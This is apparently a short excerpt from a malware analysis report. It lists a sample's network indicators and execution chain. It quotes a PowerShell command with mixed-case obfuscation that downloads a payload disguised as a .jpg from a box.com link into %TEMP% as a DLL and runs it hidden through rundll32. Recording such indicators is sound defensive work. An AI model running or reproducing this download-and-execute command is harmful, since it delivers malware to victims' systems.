Technical Information
- https://moroconfortoltdame.box.com/shared/static/bvukbse33im2e9ymokxhwf70dh3s8a0z.jpg as %temp%\bzzcqhzgtl_user_hgfoq.dll
- 'mo######ortoltdame.box.com':443
- DNS ASK mo######ortoltdame.box.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (new-obJect systeM.net.webcLIent).downLoadfILe('""https://moroconfortoltdame.box.com/shared/static/bvukbse33im2e9ymokxhwf70dh3s8a0z.jpg','%TEMP%\bzzcqhzgtl_user_hgfoq.dLL');start-process rundLL...' (with hidden window)
- '<SYSTEM32>\rundll32.exe' %TEMP%\bzzcqhzgtl_user_hgfoq.dLL starter